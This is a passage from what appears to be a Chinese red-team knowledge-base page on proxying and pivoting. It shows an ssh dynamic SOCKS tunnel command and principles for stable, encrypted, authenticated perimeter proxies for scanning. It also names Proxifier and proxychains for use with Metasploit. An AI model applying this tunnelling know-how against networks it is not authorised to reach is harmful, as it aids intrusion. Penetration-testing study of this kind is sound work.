</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>当然也可以把远程服务器当作一个加密的 SOCKS 代理：</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">ssh</span> -D <span class="token number">8080</span> -N root@10.0.0.1
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>浏览器设置代理 socks://10.0.0.1:8080</p> <h1 id="边界代理">边界代理 <a href="#边界代理" class="header-anchor">#</a></h1> <p><strong>遵循三个原则</strong></p> <ol><li><strong>稳定性</strong>（主要用于扫描）{ 支持高并发、自动断线重连 }</li> <li><strong>安全性</strong>（防止socks5直接被ban）{ 流量可加密、开放代理可设置认证 }</li> <li><strong>健壮性</strong>   { 支持多种协议方式、最好支持插件定制 }</li></ol> <p><strong>Windows连接</strong></p> <p>Proxifier全局代理（<a href="https://pan.wgpsec.org" target="_blank" rel="noopener noreferrer">狼盘下载<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>）</p> <p><strong>Linux连接</strong></p> <p>使用<a href="https://github.com/rofl0r/proxychains-ng" target="_blank" rel="noopener noreferrer">proxychains<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>，配合MSF使用</p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/hw/border-info.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        互联网边界打点
      </a></span> <span class="next"><a href="/knowledge/hw/host-survival-domain.html">
        域内主机存活探测
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/52.fb0a5327.js" defer></script>
  </body>
</html>